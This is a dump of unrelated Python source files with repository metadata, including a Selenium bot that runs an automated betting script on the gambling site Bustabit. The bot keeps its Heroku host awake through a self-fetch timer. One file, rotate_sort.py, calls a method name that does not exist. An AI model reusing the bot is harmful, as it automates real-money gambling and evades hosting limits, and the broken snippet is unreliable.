for fname in fnames_test])
ids_tot.append(ids)
raw_series9 = creat_mne_raw_object(fnames_test[1], read_events=False)
raw_series10 = creat_mne_raw_object(fnames_test[0], read_events=False)
series = np.array([10] * raw_series10.n_times +
[9] * raw_series9.n_times)
series_test_tot.append(series)
subjs = np.array([subject]*raw_test.n_times)
subjects_test_tot.append(subjs)
# save validation infos
subjects_val_tot = np.concatenate(subjects_val_tot)
series_val_tot = np.concatenate(series_val_tot)
lbls_tot = np.concatenate(lbls_tot)
toSave = np.c_[lbls_tot, subjects_val_tot, series_val_tot]
np.save('infos_val.npy', toSave)
# save test infos
subjects_test_tot = np.concatenate(subjects_test_tot)
series_test_tot = np.concatenate(series_test_tot)
ids_tot = np.concatenate(ids_tot)
toSave = np.c_[ids_tot, subjects_test_tot, series_test_tot]
np.save('infos_test.npy', toSave)
| [
"[email protected]"
] | |
c10252bfec21903bc8ae0d91f331ff0f08794f14 | 95ee2471fd393c9cb9807a867dbf6bc000c83484 | /Python/extraset.py | f4b2b970cfc213c7388b6e33f581b6bff00581b5 | [] | no_license | Hugens25/School-Projects | 6c7be0e3f96c651162595bb467de2334d2f91152 | b8d40c4cfcf811e7a62f6d5e1c2bf5bd8d5b1480 | refs/heads/master | 2020-07-02T15:01:39.898406 | 2019-08-10T02:34:21 | 2019-08-10T02:34:21 | 201,565,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,238 | py | #import itertools
def compare_vals(a,b):
possible_values = [0,1,2]
possible_values.remove(a)
possible_values.remove(b)
#print('Possible Values [0]: {}'.format(possible_values[0]))
return possible_values[0]
num_cases = int(input())
for i in range(num_cases):
info = list(map(int, input().split()))
attributes = info[0]
total_cards = info[1]
all_cards = []
count = 0
for j in range(total_cards):
all_cards.append(list(map(int, input().split())))
#combos = itertools.combinations(all_cards, 2)
needed_card = []
for i in range(len(all_cards)):
for j in range(i+1,len(all_cards)):
for k in range(attributes):
possible_values = [0,1,2]
if all_cards[i][k] == all_cards[j][k]:
needed_card.append(all_cards[i][k])
if all_cards[i][k] != all_cards[j][k]:
needed_card.append(compare_vals(all_cards[i][k],all_cards[j][k]))
#print(needed_card)
if needed_card in all_cards:
count += 1
#print(needed_card)
needed_card.clear()
else:
needed_card.clear()
print(int(count/3))
| [
"[email protected]"
] | |
e3081826c16e08d1104471dac1a6abd7e415551c | b8a195eff34bb7a03012b27356536f9713f18ff6 | /I0320063_exercise9.5.py | 957b970e95aadabddc1e142216cb19f8725219a3 | [] | no_license | AfinFirnas/Muhammad-Firnas-Balisca-Putra_I0320063_Abyan_Tugas9 | f66711831a01f0b30af1779093051fcb43fc0b25 | 89083ee2c37f73fa9a218e12bb0a92db353bf8cc | refs/heads/main | 2023-04-17T14:48:59.361287 | 2021-04-30T11:51:38 | 2021-04-30T11:51:38 | 363,116,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | A = [
[
[10,20,30],
[40,50,60]
],
[
[11,21,31],
[41,51,61]
]
]
# mengakses elemen 10
print(A[0][0][0])
# mengakses elemen 50
print(A[0][1][1]) | [
"[email protected]"
] | |
24da100dd2dcfb1fbf2dc0f990d2db5cecb40f9e | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_01_01/operations/_blob_services_operations.py | 0d43959e0413d45f681583c3efd5aacfe3752027 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 13,580 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class BlobServicesOperations(object):
"""BlobServicesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2021_01_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
account_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.BlobServiceItems"]
"""List blob services of storage account. It returns a collection of one object named default.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either BlobServiceItems or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.storage.v2021_01_01.models.BlobServiceItems]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobServiceItems"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('BlobServiceItems', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/blobServices'} # type: ignore
def set_service_properties(
self,
resource_group_name, # type: str
account_name, # type: str
parameters, # type: "_models.BlobServiceProperties"
**kwargs # type: Any
):
# type: (...) -> "_models.BlobServiceProperties"
"""Sets the properties of a storage account’s Blob service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The properties of a storage account’s Blob service, including properties for
Storage Analytics and CORS (Cross-Origin Resource Sharing) rules.
:type parameters: ~azure.mgmt.storage.v2021_01_01.models.BlobServiceProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BlobServiceProperties, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_01_01.models.BlobServiceProperties
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobServiceProperties"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01"
blob_services_name = "default"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_service_properties.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'BlobServicesName': self._serialize.url("blob_services_name", blob_services_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'BlobServiceProperties')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('BlobServiceProperties', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_service_properties.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/blobServices/{BlobServicesName}'} # type: ignore
def get_service_properties(
self,
resource_group_name, # type: str
account_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.BlobServiceProperties"
"""Gets the properties of a storage account’s Blob service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BlobServiceProperties, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_01_01.models.BlobServiceProperties
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobServiceProperties"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01"
blob_services_name = "default"
accept = "application/json"
# Construct URL
url = self.get_service_properties.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'BlobServicesName': self._serialize.url("blob_services_name", blob_services_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('BlobServiceProperties', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_service_properties.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/blobServices/{BlobServicesName}'} # type: ignore
| [
"[email protected]"
] | |
047f00770d20b8038d7afcd98a956810a9380d97 | fa305ce263851654d122d2b2074ed08b0910c952 | /bot.py | 98fd1e289164908842495702378813acfad8959f | [] | no_license | kimelecta/bustabot | 8a413d328de07fb8a3aa696f7ddc6eeb0c6d1ce0 | c613b5b33d43270a699ae76442bc28c79882ffa1 | refs/heads/master | 2022-11-06T22:03:05.376727 | 2020-06-17T13:55:11 | 2020-06-17T13:55:11 | 272,973,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,466 | py | from http.server import HTTPServer, BaseHTTPRequestHandler
import os
import time
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import sys
HOST = ''
PORT = os.environ['PORT']
URL = os.environ['HEROKU_APP_URL']
SIMULATION = False
class MyHTTPHandler(BaseHTTPRequestHandler):
"""The request handler class for our server.
It is instantiated once per connection to the server.
"""
def do_GET(self):
self.send_response(200, 'OK')
self.send_header('Content-type', 'text/plain')
self.end_headers()
# Modify log container height to get more log
self.server.webdriver.execute_script("document.getElementsByClassName('logListContainer')[0].style.height = '400px'") # modify the height to have more log
log = self.server.webdriver.find_element_by_xpath("//div[@class='ReactVirtualized__Grid__innerScrollContainer']").text
# Open profile screen
self.server.webdriver.find_element_by_xpath("//a[@href='/account/overview']").click()
# Wait for the information table to show
wait = ui.WebDriverWait(self.server.webdriver, 1)
try:
wait.until(EC.presence_of_element_located((By.XPATH, "//table[@class='table-light table table-condensed table-hover']")))
except:
self.wfile.write(b'error')
return
# Get usefull player informations
game_profit = self.server.webdriver.find_element_by_xpath("//table[@class='table-light table table-condensed table-hover']/tbody/tr[7]/td[2]").text
username = self.server.webdriver.find_element_by_xpath("//div[@class='account-header']/h3").text
balance = self.server.webdriver.find_element_by_xpath("//table[@class='table-light table table-condensed table-hover']/tbody/tr[8]/td[2]").text
# Close profile screen
self.server.webdriver.find_element_by_xpath("//button[@class='close']").click()
msg = 'Username : ' + username + '\nProfit : ' + game_profit + '\nBalance : ' + balance + '\n\n' + log
self.wfile.write(bytes(msg, 'utf-8'))
class Server:
"""This class deserve the Heroku $PORT environnement variable
It must be instantiated only once
"""
_httpd = None
def __init__(self, webdriver):
self._httpd = HTTPServer((HOST, int(PORT)), MyHTTPHandler)
self._httpd.webdriver = webdriver
def run(self):
self._httpd.serve_forever()
class Bustabit:
"""The Bustabit class is the core of this project
It instantiate and run the selenium's webdriver used to communicate with the bustabit site
"""
_error = False
_webdriver = None
_script = None
def __init__(self, profile_folder, script_name):
fd = open(script_name, "r")
self._script = fd.read()
fd.close()
# Launch Firefox GUI in headless mode
opt = webdriver.FirefoxOptions()
opt.headless = True
self._webdriver = webdriver.Firefox(firefox_profile=profile_folder, firefox_options=opt)
return
def _connect(self):
"""Init webdriver"""
self._webdriver.get('https://www.bustabit.com/play')
# Wait until we find the presence of the 'auto' button
try:
wait = ui.WebDriverWait(self._webdriver, 5)
wait.until(EC.presence_of_element_located((By.XPATH, "//li[@class='' and @role='presentation']/a[@role='button' and @href='#']")))
except:
print('Are you sure you are logged with your profile ?')
self._error = True
return
def _auto_bet(self):
"""Starting auto bet with the user script (butabit_script.js)"""
# Get and click on 'Auto' button
self._webdriver.find_element_by_xpath("//li[@class='' and @role='presentation']/a[@role='button' and @href='#']").click()
# Get and click on the eye button
self._webdriver.find_element_by_xpath("//button[@class='btn btn-xs btn-info']/i[@class='fa fa-eye']").click()
time.sleep(1) # Wait for the popup to dislay
# Fill the text area with the user script
text_area = self._webdriver.find_element_by_xpath("//textarea[@class='form-control']")
text_area.click()
text_area.send_keys(Keys.CONTROL, 'a')
text_area.send_keys(Keys.RETURN)
text_area.send_keys(self._script)
# Get and click on the 'Save Script' button
self._webdriver.find_element_by_xpath("//button[@class='btn btn-success' and @type='submit']").click()
time.sleep(1)
# Get and click on the 'Down arrow' button
self._webdriver.find_element_by_xpath("//button[@class='btn btn-xs btn-default']").click()
if (SIMULATION):
# Get and click on 'Simulation' checkbox
self._webdriver.find_element_by_xpath("//div[@class='checkbox simCheckbox']/label/input[@type='checkbox']").click()
# Get and fill the 'simulated balance'
SIMULATED_BALANCE = 100000
simulated_balance_textbox = self._webdriver.find_element_by_name("simulatedBalance")
simulated_balance_textbox.clear()
simulated_balance_textbox.send_keys(str(SIMULATED_BALANCE))
# Get and click on the 'Run script' button
self._webdriver.find_element_by_xpath("//button[@class='btn btn-success' and @type='submit']").click()
return
def _run(self):
"""Infinite loop"""
# Trick to keep this heroku app alive
# 60 * 1000 = 1 minute
self._webdriver.execute_script("""setInterval(function(){
fetch('""" + URL + """')
}, 60 * 1000 * 10)
""")
s = Server(self._webdriver)
s.run()
def start(self):
"""Start the Bustabit bot"""
self._connect()
if (self._error):
self._webdriver.quit()
return
self._auto_bet()
self._run()
return
FIREFOX_DIR = "firefox_profile"
SCRIPT_NAME = "bustabit_script.js"
if __name__ == "__main__":
if not os.path.isdir(FIREFOX_DIR):
print(FIREFOX_DIR + ' must be a directory')
exit(1)
if not os.path.isfile(SCRIPT_NAME):
print(SCRIPT_NAME + ' must be a file')
exit(1)
bot = Bustabit(FIREFOX_DIR, SCRIPT_NAME)
bot.start()
exit(0)
| [
"[email protected]"
] | |
6893b1b04629476fddf2845af7cfe5908b9cb720 | 72e11a80587342b3f278d4df18406cd4ce7531e8 | /hgdemandimport/demandimportpy3.py | e2ea27fa0f1166fc55324efb1bbdaf6c4a5029c6 | [] | no_license | EnjoyLifeFund/Debian_py36_packages | 740666f290cef73a4f634558ccf3fd4926addeda | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | refs/heads/master | 2021-08-24T02:17:24.349195 | 2017-12-06T06:18:35 | 2017-12-06T06:18:35 | 113,167,612 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,498 | py | # demandimportpy3 - global demand-loading of modules for Mercurial
#
# Copyright 2017 Facebook Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""Lazy loading for Python 3.6 and above.
This uses the new importlib finder/loader functionality available in Python 3.5
and up. The code reuses most of the mechanics implemented inside importlib.util,
but with a few additions:
* Allow excluding certain modules from lazy imports.
* Expose an interface that's substantially the same as demandimport for
Python 2.
This also has some limitations compared to the Python 2 implementation:
* Much of the logic is per-package, not per-module, so any packages loaded
before demandimport is enabled will not be lazily imported in the future. In
practice, we only expect builtins to be loaded before demandimport is
enabled.
"""
# This line is unnecessary, but it satisfies test-check-py3-compat.t.
from __future__ import absolute_import
import contextlib
import importlib.abc
import importlib.machinery
import importlib.util
import sys
_deactivated = False
class _lazyloaderex(importlib.util.LazyLoader):
"""This is a LazyLoader except it also follows the _deactivated global and
the ignore list.
"""
def exec_module(self, module):
"""Make the module load lazily."""
if _deactivated or module.__name__ in ignore:
self.loader.exec_module(module)
else:
super().exec_module(module)
# This is 3.6+ because with Python 3.5 it isn't possible to lazily load
# extensions. See the discussion in https://python.org/sf/26186 for more.
_extensions_loader = _lazyloaderex.factory(
importlib.machinery.ExtensionFileLoader)
_bytecode_loader = _lazyloaderex.factory(
importlib.machinery.SourcelessFileLoader)
_source_loader = _lazyloaderex.factory(importlib.machinery.SourceFileLoader)
def _makefinder(path):
return importlib.machinery.FileFinder(
path,
# This is the order in which loaders are passed in in core Python.
(_extensions_loader, importlib.machinery.EXTENSION_SUFFIXES),
(_source_loader, importlib.machinery.SOURCE_SUFFIXES),
(_bytecode_loader, importlib.machinery.BYTECODE_SUFFIXES),
)
ignore = []
def init(ignorelist):
global ignore
ignore = ignorelist
def isenabled():
return _makefinder in sys.path_hooks and not _deactivated
def disable():
try:
while True:
sys.path_hooks.remove(_makefinder)
except ValueError:
pass
def enable():
sys.path_hooks.insert(0, _makefinder)
@contextlib.contextmanager
def deactivated():
# This implementation is a bit different from Python 2's. Python 3
# maintains a per-package finder cache in sys.path_importer_cache (see
# PEP 302). This means that we can't just call disable + enable.
# If we do that, in situations like:
#
# demandimport.enable()
# ...
# from foo.bar import mod1
# with demandimport.deactivated():
# from foo.bar import mod2
#
# mod2 will be imported lazily. (The converse also holds -- whatever finder
# first gets cached will be used.)
#
# Instead, have a global flag the LazyLoader can use.
global _deactivated
demandenabled = isenabled()
if demandenabled:
_deactivated = True
try:
yield
finally:
if demandenabled:
_deactivated = False
| [
"[email protected]"
] | |
e719552d07f6604b77bce83362de1ffe0652ab54 | 4491c65a31063f9282a504601866f63e52fe2c75 | /tts.py | aa6a27419a7cdfd623a87739619acb6a33224752 | [] | no_license | Pranad17/text-to | 904e66259319a3f9aaf0d660768ba8fcd8d4b700 | b9ed2cb55765fe616482aee46b59375a11258877 | refs/heads/main | 2023-06-01T18:50:50.662538 | 2021-06-16T10:20:11 | 2021-06-16T10:20:11 | 377,455,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 864 | py | import tkinter as tk
import pyttsx3
engine = pyttsx3.init()
class Widget():
def __init__(self):
self.root = tk.Tk()
self.root.title("TTS")
self.root.resizable(0,0)
self.root.configure(background="cyan")
self.label = tk.Label(text="What you want me to speak?",bg="cyan",fg="black",font="Arial 35 bold")
self.label.pack()
self.entry = tk.Entry(font="Arial 25",width=30)
self.entry.pack()
self.button = tk.Button(text="SPEAK",bg="royalblue",fg="brown",font="Arial 30 bold",command=self.clicked)
self.button.pack()
self.root.mainloop()
def clicked(self):
text = self.entry.get()
self.speak(text)
def speak(self,text):
engine.say(text)
engine.runAndWait()
if __name__ == "__main__":
temp = Widget() | [
"[email protected]"
] | |
d070ea5b57e7c9f251743e491b019532adcef562 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_indispositions.py | fabc644b17f9f752e045cebb4233bf3276caa5da | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py |
#calss header
class _INDISPOSITIONS():
def __init__(self,):
self.name = "INDISPOSITIONS"
self.definitions = indisposition
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['indisposition']
| [
"[email protected]"
] | |
ea9dec07d951070f1a5289ec38c7b9b3c3248485 | de8b2b0de2ba522493e2c86fa055df8c7c40aa69 | /e008-largest-product.py | e1ab6fb66b56899bf4385b65ab78fb2590571507 | [
"Unlicense"
] | permissive | bayramcicek/mini-programs | 56edbd2013704813d6730ecaf684baf9042d21ab | 3f876e3274b7beeb5e7413ac9c5275813d9f0d2d | refs/heads/master | 2021-07-03T03:57:02.874127 | 2020-09-27T11:09:07 | 2020-09-27T11:09:07 | 138,440,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | #!/usr/bin/python3.6
# created by cicek on 12.10.2018 15:09
digits = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
d_list = list(digits)
i, res = 0, 1
product_array = []
while ((i+12) < len(d_list)):
for x in range(0, 13):
res *= int(d_list[i+x])
product_array.append(res)
res = 1
i += 1
product_array.sort()
print(product_array[-1])
| [
"[email protected]"
] | |
362e9abe387de8ee165bafdca75d22ecb015f9f1 | 40efe4cdb4d7845ce7adca4b3d48aaeb2c0f35fb | /rotate_sort.py | 8412180883b47c121dd7bd07654c069a3a569c9d | [] | no_license | viz06/python_codes | b663d360d223e549401b5c10534c9085c5def6a9 | 93b067afa4ba02fba73c9709c922983b2bf9ac09 | refs/heads/master | 2022-12-19T10:16:42.645697 | 2020-09-20T19:27:10 | 2020-09-20T19:27:10 | 295,674,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | class Solution:
count=0
def findKRotation(self,arr, n):
for i in range(n-1):
if(arr[i]>arr[i+1]):
return i+1
return 0
if __name__=='__main__':
tc=int(input())
while tc>0:
n=int(input())
a=list(map(int,input().strip().split()))
ob=Solution()
ans=ob.findKRotations(a,n)
print(ans)
tc=tc-1
| [
"[email protected]"
] | |
306b1205394bae0e6a5f9c63abcc56d5c25288b4 | 5a6ea469a1a6571281e8a23ff8fbc4c3ea205a0f | /util/visualizer.py | 283a78e9dfa482932160f889533973dfff9919bf | [] | no_license | 123456789lin/Pytorch-CycleGAN-Simplified | ee00d32d1db3c5b7daf2bfdb273dcb487ee4e8de | 364b1c36a0090c0a37e22c95eec4388dc5db90e4 | refs/heads/master | 2022-12-10T00:57:48.497532 | 2020-08-30T06:12:54 | 2020-08-30T06:12:54 | 291,289,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,896 | py | import numpy as np
import time
import os
import sys
import ntpath
from . import util
from subprocess import Popen, PIPE
if sys.version_info[0] == 2:
VisdomExceptionBase = Exception
else:
VisdomExceptionBase = ConnectionError
def save_images(result_dir, visuals, image_path, aspect_ratio=1.0):
"""Save images to the disk.
Parameters:
visuals (OrderedDict) -- an ordered dictionary that stores (name, images (either tensor or numpy) ) pairs
image_path (str) -- the string is used to create image paths
aspect_ratio (float) -- the aspect ratio of saved images
width (int) -- the images will be resized to width x width
"""
image_dir = os.path.join(result_dir, 'images')
short_path = ntpath.basename(image_path[0])
name = os.path.splitext(short_path)[0]
if not os.path.exists(image_dir):
os.makedirs(image_dir)
ims, txts, links = [], [], []
for label, im_data in visuals.items():
im = util.tensor2im(im_data)
image_name = '%s_%s.png' % (name, label)
save_path = os.path.join(image_dir, image_name)
util.save_image(im, save_path, aspect_ratio=aspect_ratio)
class Visualizer():
"""This class includes several functions that can display/save images and print/save logging information.
"""
def __init__(self, opt):
self.opt = opt # cache the option
self.name = opt.name
self.log_name = os.path.join(opt.checkpoints_dir, opt.name, 'loss_log.txt')
with open(self.log_name, "a") as log_file:
now = time.strftime("%c")
log_file.write('================ Training Loss (%s) ================\n' % now)
def display_current_results(self,img_dir, visuals, epoch):
# save images to the disk
if not os.path.exists(img_dir):
os.makedirs(img_dir)
for label, image in visuals.items():
image_numpy = util.tensor2im(image)
img_path = os.path.join(img_dir, 'epoch%.3d_%s.png' % (epoch, label))
util.save_image(image_numpy, img_path)
# losses: same format as |losses| of plot_current_losses
def print_current_losses(self, epoch, iters, losses):
"""print current losses on console; also save the losses to the disk
Parameters:
epoch (int) -- current epoch
iters (int) -- current training iteration during this epoch (reset to 0 at the end of every epoch)
losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
"""
message = '(epoch: %d, iters: %d) ' % (epoch, iters)
for k, v in losses.items():
message += '%s: %.3f ' % (k, v)
print(message) # print the message
with open(self.log_name, "a") as log_file:
log_file.write('%s\n' % message) # save the message
| [
"[email protected]"
] | |
65652e1063e82634e4fdc2f3a31ef4a64f108db3 | 64734dce0e290095599e31d0c80920bc58d2779b | /intro to test/test.py | b98f4767518c68a9384f688ef5ff0bcbe25311bc | [] | no_license | satyamsingh2/developers-suitcase | 33f6e9fe6b8660621aa27439c320b252db322f32 | bb0651fc6b85c2249459d383e67a68147df19e44 | refs/heads/main | 2023-07-10T14:21:12.544243 | 2021-08-06T05:08:22 | 2021-08-06T05:08:22 | 360,185,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | from demo import *
import unittest
# a unit test is required to be defined inside a class
class TestArea(unittest.TestCase):
def setUp(self):
pass
#runs before running test used as preparation method before test
def test_area_of_rect(self):
self.assertEqual(area_of_rect(5,6), 30)
#basic test method 1
def test_area_of_square(self):
self.assertEqual(area_of_square(8), 64)
#basic test method 2
def test_input_value(self):
self.assertRaises(TypeError, area_of_square, True)
def tearDown(self):
pass
# runs after all the test have been run this is used for purpose like deleting the content or closing the file ,etc.
# python -m unittest discover -> use this command is used for auto discovery for test
# it will not only search them but also attempt testing all the test file present in that directory
# python -m unittest discover -s <directory-name>
# python -m unittest -v <filename>
#the command is used run all the test in verbose mode in a file
# its not compulsory to run a unittest with verbose
| [
"[email protected]"
] | |
